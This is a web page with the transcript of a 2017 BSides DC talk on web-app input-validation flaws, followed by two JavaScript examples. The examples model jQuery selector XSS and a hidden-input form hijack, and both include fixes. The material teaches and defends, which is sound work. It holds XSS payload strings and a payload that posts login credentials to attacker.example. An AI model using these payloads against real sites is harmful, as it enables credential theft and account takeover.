
Forgotten Inputs: Finding Web App Flaws By Understanding The Dev's Mind

BSides DC · 2017 · 48:33 · 110 views · Published 2017-10 · Watch on YouTube ↗
Category: Technical
Team: Red
Style: Talk
About this talk
A developer-turned-pentester explores how understanding a web developer's mindset reveals forgotten input-validation flaws. The talk covers cross-site scripting, open redirects, CSRF, reflection attacks, and jQuery vulnerabilities—showing how to chain multiple flaws for more sophisticated exploitation.
Nothing provides an edge in a web application penetration test quite like understanding how the developer sees things. As a developer-turned-pentester, Mic often has insight into the inputs a web app developer will most forget to protect, and how to exploit them.

Mic Whitehorn-Gillam (Senior Security Consultant at Secure Ideas): I'm Mic, and I have been putting stuff on the internet for nearly 20 years. Within that, I spent over a decade as a web application developer (usually full-stack), having worked with a wide variety of technology stacks. I'm also a long-time security enthusiast, having made the switch from primarily building web applications (and unofficially assessing them for security flaws) to primarily penetration testing web applications (and unofficially building them, on the side).

(Updated video editing)
Transcript [en]

The BSides DC 2017 videos are brought to you by ThreatQuotient, introducing the industry's first threat intelligence platform designed to enable threat operations and management, and DataTribe, a new kind of startup studio co-building the next generation of commercial cybersecurity analytics and big data product companies.

Hi everybody, welcome back. Everybody have a good lunch? Awesome. Full disclosure: I'm a super nervous speaker, so I haven't actually had lunch yet, because it would be over there right now. It's also the first time I've ever been given a raised platform, so hopefully I don't fall off, but that'll be good. So the advice I've sort of been given, as I've been working on my speaking thing over the last little while, the advice I've been given by the guys I work with who do it more, is always open with a joke, and usually it's something like: why wasn't Walmart hacked? Because it's not a Target, right? [Applause] But it's been a while since the Target hack and it's less relevant, so I came up with something new, I think. We'll see; you're my test audience.

So, directly from their privacy policy, and that was still there as of at least yesterday; I didn't check today.

All right, I hate talking about myself, but I'm going to do it for a little bit anyway. I'm a senior security consultant at Secure Ideas. I come from a dev background originally. I started slinging code in the late 80s, when I was very young, progressed into some procedural programming, and then around '97 I started sticking websites up on the internet, I think starting with GeoCities, and it just kind of grew from there. I did ten-ish years professionally as a web app developer and five as a system integration consultant, so I've got a pretty good handle on the dev mindset, how they think and what factors influence them.

I've got a kind of reputation among my peers for, no, 'dangerous' isn't really the right word, more 'playful', for weaving my cross-site scripting payloads into the applications that have the injection flaws rather than breaking the application. By coming at it that way you can do some really fun and interesting stuff, like hijacking their Ajax methods so that everything works as usual but I also get a copy of the requests and responses on my server, that sort of thing.

One of my favorite parts of my job, well, first of all, what do I do? Most of what I do is penetration testing and writing the reports for the penetration tests, so there's a good part and a bad part, obviously, right there; nobody likes reports. In terms of what I test, it's kind of everything. I do a lot of applications because of my background, but I also do internal and external networks along with the rest of my team. We're a small consultancy, so everybody has to do some of everything and everybody's expected to develop that generalist skill set. As a developer I was kind of a generalist anyway, because although I often had full-stack responsibilities I also hopped back and forth between .NET and Java; I didn't really take a side, and that's probably where some of the JavaScript came from. It was the constant in all of that.

You know, while I don't like writing the pen test reports, because nobody does, it's not the fun part of the job, it is the deliverable. What I do like is looking at the different flaws and seeing, well, how can these fit together to augment each other? What sort of unique opportunities can I create by using not one flaw but two or three or four combined? I've got my, we'll move on to the actual topic really soon, I've got my Twitter and email up there, and feel free to take out your phone and take a picture. You could follow me if you want. If you have a question afterwards, if Wednesday of next week comes around and you're thinking about a web app thing, feel free to shoot me a question. I don't mind, and same thing, you can send me a direct message on Twitter. I genuinely like helping people, so although if I'm on site with a client I might not have time to respond within, you know, an hour or a few minutes, I definitely try to answer any questions that I get.

OK, that's enough about me; let's move on. So what am I talking about with 'forgotten inputs', the title of the presentation? Mostly flaws around missing or insufficient input validation. So, going back to cross-site scripting a little bit, maybe.

Yeah, and it's not always injection, but injection is a common use of this. So there is somewhere that I'm sticking some sort of input, usually in a request, that then gets executed, either in a JavaScript event on the page or just a direct script injection. Is that dangerous? People debate that a little bit; I would say definitely a resounding yes. Examples of the things I can do with it, potentially: steal sessions; steal data that's going in and being exchanged with the server, which is more likely to be in a persistent state even if it's not stored in the database. Now, if I've executed my script on a single-page app, until somebody navigates away, you know, the damage is done. I could fake a session timeout and convince you to log back in on a form that looks like the right one and is actually hosted on the right domain, but sends credentials to me and then shows you your app back just like you logged back in. I could prompt you to install a browser plugin. Now, to be fair, if it's in the Chrome Web Store there is a degree of code review on that, but I could probably also social engineer somebody into turning on developer mode and installing a plugin unsafely.

I mean, look at Facebook right now, well, not right now right now, but today, at any point: you go to Facebook, pop open the developer tools in your browser (if you don't know where they are, find them, because it's good to know where they are), pop them up while you're on Facebook and you get a big warning, because people were successfully convinced to pop open the developer tools and copy and paste a cross-site scripting payload into their own browser, so they attacked themselves, basically. It was a big enough issue that they had to put a great big warning in there on Facebook, in big red letters: don't paste stuff in here if you don't know what you're doing.

So this is where, yeah, it's important to safeguard anything that is user input, and developers, um, do I have any developers in the room? I'm not going to insult you anyway. I've got a few, not a small number. Um, if it's supposed to be user input, they will almost always safeguard it pretty well on newer applications; some of the legacy ones, not so much. What they're not good at, in my experience, and on a large scale: a lot of them are not trained in security at all. There were security issues too. I did work with trading systems that were doing, you know, hundreds of millions of dollars in transactions a day, maybe billions in some cases, and never had secure coding training provided. I had anti-money-laundering training provided all the time, but not anything about dealing with code flaws, and so sometimes there were gaps in knowledge that caused mistakes. But that's not really what we're focused on with this talk. Mainly what I'm focused on is the sort of stuff that just gets overlooked, and a lot of that is down to deadlines, pressure, you know, that sort of need to push things forward to get it within the sprint or hit a certain milestone in a waterfall project, if anybody does those anymore. That causes things to not be as thorough as they could be, and even if you have a dedicated QA department, there are certain things that they usually don't test; they're not trained to look for them.

So for the most part it's stuff that is not the fields on the form. You know, those are user input for sure. There are values, in a lot of cases, that you're setting in code somewhere, where you're not expecting the user to touch them, or rather the developer isn't. It's funny, I actually have a lot more developers in this room. The last time I did a version of this talk it was aimed at developers specifically and I had like two developers in a room this size. Yeah, so it stuck. Hidden fields, for example, the HTML inputs that are type 'hidden': they're not there for the user, but the user has access to them, and either through playing with them in the dev tools in the browser, maybe writing script on the console, or using a man-in-the-middle proxy if you're doing a pen test, usually those can be manipulated. So they're not actually necessarily safe, but often the validation on them can be forgotten. The parameters in the URL, and that's not limited to the query string; we'll talk about some of the other types of parameters that can be in the URL. That's sort of the first thing up.

But that's an example; this is an area where there are a variety of things the user has some control over. The last one is actually often inputs, but not user-selected values; 'perceived limitations' is the broad term that I used for it. So you had something like a select list, right? You're either picking an item from a list or a drop-down, and you're presented with a list of human-friendly values, and behind that there's a list of IDs attached as well, the actual values that get sent when the form gets submitted. A lot of times people don't think, with their applications, about making sure... they'll test in some cases that, I was expecting a state, let's make sure it's one of my states, sometimes. But if they forget that, they've probably also forgotten, well, somebody just changed the value to an injection of some kind, or is attempting an injection.

File names are another one, and file names are, on this list, probably the highest success percentage. If I have a place where I can upload a file in an application and it gets displayed to, I mean from an attack perspective, probably another user would be more relevant, I would say certainly greater than fifty percent of the time there's an injection flaw there, using some really creative file names. So that's actually going to be probably my last example, because I think it's my favorite one to finish on. But let's move ahead into the address bar and move on from there.

Before I get to that: I worked a project at one point, an integration project. I came into it late; a lot of the development was done, but I was doing a lot of performance testing. This is about to become relevant to the next slide, but not really to the topic; it's a fun one to talk about. This was in a bank, yeah, a big, kind of conservative organization. They're important, but they're not agile. So I'm doing these performance tests and generating charts, and they liked that, and it didn't really matter that we had basically performance tested, optimized, and didn't need to do any more. Four months, four months I was just asked to go back, do some more testing, add some more charts, update the report so that it could go to the higher-ups, because they like pictures. So I included some pictures today. There's no, it's an arbitrary division that I kind of made up in my head; there's no statistical support for this, but we call that evidence that is anecdotal. Yeah, it's kind of anecdotal. So the areas of concern, when you know you have an input field, you know the biggest thing is:

Does it work the way it's supposed to when people do what they're supposed to do, right? Because that is the real task you've been given. Gracefully failing with bad input is important too, like if somebody were to make an error, and I've given it the green sliver; I put that there, as, you know, a reasonable amount of effort goes, probably in a lot of cases, into treating input as hostile or potentially hostile, at least in a web application. As soon as it's supposed to be coming from a trusted source, the whole thing kind of shifts on you, because it's coming from your own database, an API you control, it's coming from somewhere where theoretically the work has been done, and I think those are places where I just haven't seen the same amount of attention to: well, it could be a bad value, because it shouldn't be a bad value; it could be a hostile value, well, there's no reason hostile data should be coming in from over there. But that's kind of the way it seems to be. And again, there's actually a reason there's no actual unit of measurement labeled here as well, because I don't know what the appropriate one would be. Yeah, 'thoughts per minute', maybe, I don't know.

So, what is user input? Also, I just pulled this off the internet; I don't know that university or anything like that, just a disclaimer. But yeah, it's sort of an example, though, a relevant example. You've got these fields that definitely are coming from somebody who has filled out and submitted the form, right: the organization code, the org name, the amount of money, a big text field for description, some signatures, and then you get in the corner here, you have this 'office use only' section, right? And what's the input control on that? It's a person, right; a person looks at it. But it is part of the form, and anybody filling out the form could also check 'approved', right, and the date, then make up some initials and submit it somewhere other than to the person checking it. There's no reason to think that would get caught, and with a web application it's not a person checking every request that comes in, right; it's the actual technological controls. Also, if this was being submitted and then digitized somewhere, I could write something on the top or on the side and it would take no time at all for people to not remember where it came from or who wrote it there.

So, moving up to the address bar, kind of getting back on topic a little bit. So there's a bunch of stuff, and it tends to get some attention. I would say

I see problems in the address bar less often than I do injection flaws in file names, for example, but it does get forgotten sometimes, or it'll be an otherwise secure app with one thing not quite right. Mainly three kinds of input that you see, not counting the HTTP method, which is not actually in the bar. So you've got the query string, which I think I'm probably in a room full of people that all know what the query string is, but I'm going to say it anyway. So in this example, the goto=/profile: it's the parameters for the GET request that come after the question mark, or usually it's a GET request that uses them. There are route parameters, so when you see something like mydomain/users/42 and it pulls that user's profile or whatever, that would be an example, probably, of a route parameter. And again, given the number of developers in the room, probably most people know how that works, but it's going to a routing function, and behind the scenes a router class goes, OK, this is going to the route 'users' with an ID attached, and it extracts that ID and uses it as a parameter. It's part of the framework on the server side, or it can happen on the client side as well, which is part of what brings us to the next one, the hash or anchor.

Because you've got the URL, this is sort of, in a way, a holdover from the earlier kind of internet, where often it was a big document with very little formatting. Requests at that point in time were a bottleneck, so you didn't want to do any more than you had to, so you would have links around between spots within the same document. That's what that was used for: the URL hash at the end of it (and there'll be an example of that in a bit), the hash at the end of it, and then it was the name of the element that you wanted to basically move to in the browser. But now that's often used in client-side routing, like if somebody's doing Angular, or I think most of the popular new frameworks have a router available. You don't have to use them; it's often an optional plugin. But that same concept of route parameters can also apply client-side now, and it would be whatever the endpoint is, hash, and the syntax can change a little bit, with a slash, the client-side portion of the route that's being handled on the client side. If that is actually being used to trigger API calls, then you're probably better off attacking the API directly, and that's often the case.

So one example, and it doesn't have to be a problem, it's not always a problem, but it's often a symptom that there is something to exploit, is just seeing a path in there as a parameter. It could be fine. A common place to see this sort of thing is in the situation where you request a resource and it goes, you're not authenticated, and it'll redirect you to the login page, and then when you log in, usually on the login page you'll have a parameter like this; when you log in it sends you back to the resource you originally requested. That's how it does it. So if you're seeing it used for a redirect, obviously one of the first things you want to try is, well, can I redirect it to a different site? Can I redirect somebody elsewhere? Which might not seem like a huge deal, but it can be really useful in combination with other flaws.

Now, can I get a really quick show of hands: who would feel comfortable explaining to somebody today, right now, how cross-site request forgery works? About what I thought. It's really pretty simple. If you were logged in to, I'm going to pick on Facebook for no particular reason, as far as I know they don't have such a flaw, I'm going to pick on Facebook: you log into Facebook, and as far as I can remember they're still cookie-based sessions, they give you a cookie. OK, cool. You go over to my tab, open the link that I sent you, it takes you to a page that I set up on my own server, and that page submits a request of some kind. You're probably not thinking Ajax in this case, because there are more controls around that, but a simple POST to your site. Your browser attaches your cookie to that and sends it off to Facebook, where I posted it, and if that's a status update request, then it's basically using your credentials to do a status update, because that cookie was included. It was never shown to me, but it was still sent from your browser.

So going back to the URL thing: I need you to be logged into your site, you need to be logged into this application that's vulnerable to cross-site request forgery for it to work. One way I can do that, if this sort of flaw is present, is to send you a link that goes to your login page with this parameter specified as pointing to my page. You'll go to the site you know and trust, you'll be presented with a login page, you'll log in, and it will redirect to my page, if it's an open redirect, which is a flaw. You'll arrive at my page with a brand new session in your vulnerable app, which I then exploit with cross-site request forgery.

Another particularly interesting one I saw on a test, probably six months ago: it wasn't doing anything in my browser that I could see, but there was a URL up there, and it didn't seem to reject absolute paths with a full protocol and domain. So I directed it at a site that I controlled, and I got a request on that server, and I got a JSON parsing response in the application. It was specifying an API to call within this organization; they were specifying one of their own APIs, so they controlled it, on a different server, through this. But as an attacker I could specify my own server, and then the API call was coming to me instead of them. You know, that doesn't give me anything; it doesn't give me any data. What it does do, if, as in this case, they had detailed enough error messages that you can figure out what structure it was looking for, is: I basically built up a JSON file that was what I was pointing at, a hard-coded response, which then introduced my input into a context that was supposed to be coming from their API. So as far as their app was concerned it was trustworthy. It's getting around safeguards, right, because they trust data coming from their API.

Reflection is another thing to always check for when there's really any kind of input. So, quickly, reflection: basically, if I put it in there, does it get written into the document body somewhere? Because if it does, and it gets done in an unsafe way, and that's the critical part of it (usually we're talking about concatenation, that's the most common unsafe way, but often when you see something injecting through innerHTML, the .innerHTML method on a DOM object, that's potentially subject to it). If it doesn't get reflected, doesn't get written into the document body, could I potentially use it to write my own stuff into the document body? Security controls for this, and I think it's important to talk about the security controls part of it: you know, if I'm working with somebody, I want to be able to not just break their stuff but tell them how to change it. But also, if I'm working on an attack, I need to be able to recognize whether their controls look like they're implemented right, and that can save me a lot of time not banging on something that I can tell is definitely implemented right. In some cases maybe they've gone and done something a little bit, they've tried to be too clever; sometimes that happens. I know I was guilty of it as a developer too, tried to be too clever, did something different, and there's a flaw in the implementation that can be exploited as well.

There's one more case that I've seen that was interesting, with a URL in the URL, or a path in the URL.

This is in an open source product, Liferay Portal Community Edition. It's not the current version; it is a known vulnerability that they publish on their website, so I'm not doing anything irresponsible here. But it supported a parameter where you could override the content delivery network it was using by supplying a URL, and all of a sudden the static asset requests for the JavaScript and CSS all get pointed at whatever host you specified, which basically is site-wide cross-site scripting, right? Because you download all the scripts they're supposed to have, edit them how you want, stick them up on your content delivery network, and now they're on your server.

Now, I haven't said, I think I got ahead of myself and assumed a little bit: when you're exploiting a cross-site scripting flaw that is not persisted in a database or some sort of storage, there is a social engineering element; there always is, right? It's generally a crafted link that you're sending to somebody to get them to click. This one's really hard to read, right? I'll fix that. That's basically what it looks like.

So, is anybody familiar with Thycotic? Yeah, the privileged access management solution; it's sort of like a LastPass-style password store for enterprise. Their current major version is 10-point-something; back in 9-point-something they had this exact issue. They had a structure, an encoded structure, in the URL on some of the pages, a security company, mind you. It was essentially intended to be a JSON object, but they were, I didn't actually pick apart their client-side code to find out how they were doing it wrong, but the effect is as if they were passing it into an eval function. And the important distinction there: when you use the JSON object in your browser's API and do JSON.parse, if somebody tries to include a function in the object, that'll throw a parse exception; it won't get executed. You take the same thing, a string representation of the same object, and pass it into eval, and that function gets created. So that is an example of unsafe deserialization.

Now, I should say there are a few live demos. I kind of wanted to have live demos for everything, but some of them don't really look as good as the canned ones, to be honest. For the file one at the end I definitely have a live demo; you're going to like that one. So, unsafe deserialization. First of all, this is effectively what was happening, and it's not the only place I've seen that flaw; it's just a particularly noteworthy place to see that flaw. So this is straight out of the browser's console.

Probably Chrome, I don't know; I've changed browsers a few times, or I use all of them. So, decodeURI there, to change it to a string representation, and then I use this eval statement that assigns it to something, and eval it, and then you can see the object got created, and it's an array with objects that have names and types, right, like you might use if you were dynamically defining a table structure or something. [Music] I'm going to show you two different sorts of exploits on this; hopefully you can kind of see them. Do I have, yeah, I have an arrow. So I'll show you two ways. Usually the second way is going to be the better way, but let's look at this one first. So instead of assigning a type of string, so you know JSON is kind of key-value pairs, instead of assigning a type of 'string', I've assigned an object. I have named it 'evil object', for no particular reason other than to highlight that it's an evil object. I've given it this toString function with a console.log statement in it, and return the string 'string', and then closed off the object. So you can see the eval runs, the object gets created; if I access that type field I get back this object, it has a name of 'evil object', it's the same thing. But if I compare it to a string, well, in this case I used the triple equals, which, quick two-second JavaScript primer, the difference between three equals signs and two is, with three equals signs the types have to match or it's automatically a fail; it won't try to do any coercion. And that's why this worked the way it did: that returns a false because it's comparing the string 'string' to this object that's just above that. But the next one, using the double equals sign, is comparing the same two things, but it goes, well, I'm comparing against a string, so I'm going to call the toString function to get the string representation of that object so that I can compare it. Well, your toString function in this case is my payload, so as soon as it does that comparison you can see the XSS logged out there from the execution, and it evaluates to true because it's returned that string 'string' to compare to the other string 'string'. That's kind of confusing when I say it out loud.

The case where you might favor this over the next one is probably when you're actually trying to delay execution, but if you want to execute right away you've got another option, and a pretty good one. The syntax, I'll draw your attention to it, but essentially JavaScript has a self-executing anonymous function syntax, I guess, is sort of the technical term for it. It's usually used for closures. In this case you see it's got the same function as before, but it's actually what I've assigned to the type. The 'type' part's kind of cut off a little bit, but trust me, it is. So what I've done is I've wrapped that function in another set of parentheses and then followed it with this additional set of parentheses, and that means when that function is defined it is also called right away, and I could actually pass parameters into it through the second set of parentheses if I wanted to; in this case I didn't. So as soon as the eval happens and it needs to get assigned to that type, I guess, property, that execution happens, that string value gets returned, and that's what actually gets assigned to the type. And you can see down here, when the object's expanded, that's it right there. So if I know what value was supposed to go in there, I can make sure that value still goes in there; it just goes in there after my code gets executed. [Music] They sound like they're having a lot of fun next door, don't they?

All right, now we can't get out of the address bar without talking about jQuery. Let's have a little talk about jQuery. This is stuff that is old, this is stuff that is supposed to be patched, but nobody updates the JavaScript, so we still see it in the wild all the time.

hash is one so this is JavaScript selector around or jQuery prior to me selector around location dot hash which is I talked about it earlier the hash part of the URL now does anybody remember what what a hash means in jQuery syntax Jake jQuery selector syntax four by the ID that's right so yeah it's it's using that selector to select that of the element by D's is is how that would be intended to be used and cases where you where I've seen that done are like there's a jQuery plugin for doing a tabbed interface where you can link to specific tabs and so it uses uses the hash to specify which tab to display but

there was a flaw and this was in the one dot series that was up until wool 1.6.2 which is like I want to say 2010 it was actually it wasn't reason it's just still out there but this this bit of HTML would end up getting created in the document when it runs just a mishandling of input the funny thing about it is it will yes it was patched in one point six point three but anybody using jQuery migrated and production has potentially reintroduced the flaw it's it is a matter of opinion but I would say use jQuery migrate to move up update your jQuery don't leave it running in production it's sort of a shim but if

there's a development version of it this is kind of random background I guess there's a development version of it that alerts of errors and helps you fix the break and changes that's probably what people should be doing but yeah they don't always do what they should that's the one that is most likely to be a address bar related thing but if I'm gonna mention jQuery flaws I should mention the other two big ones which are in a few versions beyond that there was the one with the the class selector so any case where it was concatenated input with that with a dot at the front to select elements of a particular class and it's basically the same kind of

thing you put in a space you put it in an HTML element it creates the HTML if anybody has been hanging around Oh ASP looking at the cross scripting list by the way is going to recognize that payload because it's it's it's an arsenic classic you can also by the way omit the quotation marks completely if you want to do an alert with a number on that one but I like this better the other thing that that was going for awhile and into several the to dot jQuery versions as well which does not mean it's in the newest one jQuery versions it's confusing a little bit that way but so the get shortcut for doing an asynchronous HTTP

GET: if it had a content type of text/javascript it would get executed right away. To issue that request in the first place you usually are going to need to have some kind of injection flaw anyway, it just makes it easier to load a payload. There are exceptions to that, though. Every so often somebody is going to write an application that lets the user supply an arbitrary URL and goes and fetches it. I think, and I think it does it safely, but Swagger, if anyone's familiar with that, it's an API tool for essentially specifying APIs, documentation, generating SDKs, and, well, fun stuff with APIs. It's got an address bar in the top of the

application where you can put in a URL of a JSON spec to pull into it. Now, as far as any version of it that I've seen, it's not vulnerable to this kind of flaw, but it is an example of that kind of use, of being able to take an arbitrary URL. Okay, hidden inputs, we're going to have to pick up the pace here a little bit. Hidden inputs. So hidden inputs, yes, we talked about them, they don't get enough attention. There's one thing that is especially interesting about them. So usually they're set on the server if there's any kind of server-side templating or inlining with something like PHP or classic ASP, but

sometimes it also gets reflected from somewhere, or the JavaScript pulls from a GET parameter and stuffs it into the value attribute. So looking at this one, considering this, we have a login form. It's got a POST, it's got username, password, there's a hidden at the top there that I've said is injectable, I just arbitrarily made that up, there's some way of injecting into that. Now obviously we could inject a script. If it's injectable we could break context and inject a script like usual, but let's pretend for a second that they're using Content Security Policy so I can't get script execution. What are my other options here? Anybody see it? No? I closed their form and then I

opened my own new form. Content Security Policy will allow it, and I can post their credentials to my own server. All right, woo, we're going to make it. Okay, fun with filenames. So this is a list of some files I have in a directory. They're fun to upload. Actually, most of the image ones are pictures of my boss; let's just get his face into the reports as much as possible. He doesn't like seeing his face in reports, and I'm just kind of a jerk and a bad employee. So yeah, so there are those. I'm going to jump over to the actual live demo of that because that's more fun, and it's not going to work from within presentation

mode. We're going to pop out of presentation mode, hopefully it's at work. Come on, come on, come on, come on, come on, come on. Ha, all right, there we go. Okay, so first of all, since we're here, man, low resolution makes it tricky here. Okay, I'm going to give this a shot and see if I can do it right, and we'll go in real time. And that is the jQuery one. Oh, that was really fast, sorry, I'll show you again. There, you can see it. There's a hash, I did this image, it's the exact same one that was in the slide. All right, let's move on to the file one because that one I think

is more fun. Hopefully I can find the right file. There we go, see, there's Kevin. Kevin, by the way, because I didn't say it earlier, he's pretty well known, he was a SANS instructor, he wrote the web pentesting and advanced web pentesting courses for them originally. There we go. And a payload from a malicious server, yeah, that's right, I forgot to mention that. So this one didn't just do an alert that was inlined there, no, no, no, this one fetched a payload from another server I was running, and I'll show you that request in a second, and pulled it in and executed it. Why did it happen twice? Anybody know, any guesses?

Because I used the vulnerable jQuery get. So here we go. That guy's a little hard to see, you can see the rendering is a little messed up, but if you can see the bottom window there's a great big touch command, my cursor's at the end of it, and the rest of the stuff is kind of an artifact. That's the filename, that's where I created it a couple hours ago. What's going on here? Well, what's a hard character to get into a filename? Forward slashes, right? Forward slash kind of screws you if you're doing anything that involves absolute paths with protocols at the front, or most URLs really. So I stole the one off

of the, you see right here, it just kind of wraps document.location.href, which on the page where it executed is this part, that's the URL. So I stole one of these slashes by substringing it out and then used it in my GET request to actually write my URL. Then you can see, well, 14, 15 here, is the GET request coming into the server. Now it is running on a port on localhost, it's localhost 8887. As long as the CORS policy is set, there's no reason you can't do this across servers, across different hosts. I just did not want to rely on an

internet connection in a conference center at a hacker conference, because that's a bad idea. So that is then my last kind of example to do. Really, don't try to connect to the server, that sucks. I think it's grumpy now. There we go, uh-huh, there we go. So we've got like three minutes, but I'll be around afterwards. I'm going to be floating around, I'll probably be in here for the next talk, but then I'll be around after that in a black t-shirt. I won't be wearing the same shirt, so look for a black t-shirt with a red circle with a devil in it. You can always ask me questions then, but we do have a couple

minutes if anybody has a question now. Yeah? I never get, oh, I don't get a lot of questions. Thank you.
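The jQuery selector flaws the talk walks through (the `$(location.hash)` fast path through 1.6.2, the `'.' + input` class-selector variant that survived into later 1.x releases, and the slash-borrowing trick from the filename demo), as an added example that is not from the talk and not jQuery's own source. The three `RQUICK_EXPR` patterns are my reconstruction of jQuery's quick-selector regex for those version lines and should be checked against the real releases before relying on the exact boundaries; `selectTabSafely` is a hypothetical replacement for the tab plugin's lookup, and the hash and class-name inputs are constructed for the walkthrough.

```javascript
'use strict';

// Reconstruction (assumption: verify against jQuery source) of the regex that
// jQuery's init() uses to decide whether a selector string is HTML, an #id, or
// a CSS selector. Capture group 1 = HTML, group 2 = id; only the HTML branch
// changes between versions.
const RQUICK_EXPR = {
  // <= 1.6.2: anything may precede the '<', so "#<img ...>" is treated as HTML
  '1.6.2': /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,
  // 1.6.3: a leading '#' can no longer precede HTML, but ".<img ...>" still can
  '1.6.3': /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,
  // 1.9.0: the string has to start with '<' (after whitespace) to count as HTML
  '1.9.0': /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,
};

// What $(selector) does with this string under a given jQuery version line.
function classifySelector(selector, version) {
  const m = RQUICK_EXPR[version].exec(selector);
  if (m && m[1]) return 'html';      // built via innerHTML: a DOM XSS sink
  if (m && m[2]) return 'id';        // getElementById fast path
  return 'selector';                 // handed to the Sizzle selector engine
}

// The forgotten input from the talk: a tab plugin doing $(location.hash).
function selectTabUnsafely(hash, version) {
  return classifySelector(hash, version);
}

// The class-selector variant: $('.' + userInput).
function selectByClassUnsafely(className, version) {
  return classifySelector('.' + className, version);
}

// Hardened lookup (hypothetical): the fragment never reaches a selector or
// innerHTML. Strip the '#', require an id-shaped token, allowlist it, and let
// the caller use document.getElementById on the result.
function selectTabSafely(hash, knownTabIds) {
  const id = hash.replace(/^#/, '');
  if (!/^[A-Za-z][\w-]*$/.test(id)) return null;
  return knownTabIds.includes(id) ? id : null;
}

// Filename trick from the demo: an uploaded filename cannot contain '/', so the
// payload borrows the slashes it needs from document.location.href at runtime.
function urlFromBorrowedSlashes(href, host, path) {
  const i = href.indexOf('//');
  const slash = href.slice(i, i + 1);          // exactly one '/'
  return 'http:' + slash + slash + host + slash + path;
}

// Constructed inputs (not captured from the talk's demo).
const XSS_HASH = '#<img src=x onerror=alert(1)>';
const XSS_CLASS = '<img src=x onerror=alert(1)>';

// Summary table: how each version line handles the two payloads.
function demo() {
  const out = {};
  for (const v of Object.keys(RQUICK_EXPR)) {
    out[v] = {
      hash: selectTabUnsafely(XSS_HASH, v),
      cls: selectByClassUnsafely(XSS_CLASS, v),
    };
  }
  out.safe = selectTabSafely(XSS_HASH, ['overview', 'settings']);
  out.url = urlFromBorrowedSlashes('http://localhost:8887/uploads/x.png',
                                   'localhost:8887', 'p.js');
  return out;
}
```

Running `demo()` shows the hash payload classified as HTML only under the 1.6.2 pattern, the class payload as HTML under both 1.6.2 and 1.6.3, and neither under 1.9.0; `selectTabSafely` rejects the payload outright. This is also why jQuery Migrate matters: it restores the permissive behaviour for compatibility, which is the speaker's point about not leaving it in production.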
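The hidden-input form hijack from the login-form example (close the real form, open one that posts to the attacker's server, which a script-only Content Security Policy does not stop), as an added example that is not the talk's own code. The login template, the `attacker.example` origin and the two CSP header strings are constructed for the illustration; `formActionPermits` is a simplified check for the caveat a practitioner should know here: `form-action` has no `default-src` fallback, so it has to be set explicitly for CSP to block the hijack.

```javascript
'use strict';

// Minimal attribute escaper: the fix the vulnerable template is missing.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/"/g, '&quot;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Constructed login form. The hidden "next" value comes from the request
// (reflected, or copied in from a GET parameter) and is inlined as-is.
function renderLoginForm(nextValue, { escape = false } = {}) {
  const v = escape ? escapeAttr(nextValue) : nextValue;
  return [
    '<form method="post" action="/login">',
    `  <input type="hidden" name="next" value="${v}">`,
    '  <input name="username"><input type="password" name="password">',
    '  <button>Log in</button>',
    '</form>',
  ].join('\n');
}

// The injected value: break out of the attribute, close the real form, open
// ours. Every field the user fills in now belongs to the attacker's form, and
// no script runs, so a script-src policy has nothing to say about it.
function formHijackPayload(attackerUrl) {
  return `"></form><form method="post" action="${attackerUrl}">`;
}

// Where do the username/password fields submit? The last <form action> opened
// before the credential inputs is the one they belong to.
function credentialSink(html) {
  const forms = [...html.matchAll(/<form\b[^>]*\baction="([^"]*)"/g)];
  const idx = html.indexOf('name="username"');
  let action = null;
  for (const m of forms) if (m.index < idx) action = m[1];
  return { formCount: forms.length, action };
}

// Parse a CSP header into directive -> source list (first occurrence wins,
// which is how browsers treat duplicate directives).
function parseCsp(header) {
  const out = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !out.has(name.toLowerCase())) out.set(name.toLowerCase(), sources);
  }
  return out;
}

// Does this policy let a form submit to attackerOrigin? Simplified: handles
// '*', an exact origin and a bare scheme source; no host wildcards.
function formActionPermits(header, attackerOrigin) {
  const sources = parseCsp(header).get('form-action');
  if (!sources) return true;                       // no form-action: anything goes
  const scheme = attackerOrigin.split('//')[0];    // e.g. "https:"
  return sources.some((s) => s === '*' || s === attackerOrigin || s === scheme);
}

// Walk both the vulnerable and the fixed rendering against both policies.
function demo() {
  const attacker = 'https://attacker.example/collect';
  const payload = formHijackPayload(attacker);
  return {
    vulnerable: credentialSink(renderLoginForm(payload)),
    fixed: credentialSink(renderLoginForm(payload, { escape: true })),
    scriptOnlyCsp: formActionPermits("default-src 'self'; script-src 'self'",
                                     'https://attacker.example'),
    withFormAction: formActionPermits("default-src 'self'; form-action 'self'",
                                      'https://attacker.example'),
  };
}
```

In `demo()` the unescaped rendering contains two forms with the credential fields inside the attacker's, the escaped rendering keeps a single form posting to `/login`, and only the policy that names `form-action` blocks the submission. Attribute escaping fixes the injection; `form-action 'self'` is the defence-in-depth for the case where some other hidden input is forgotten.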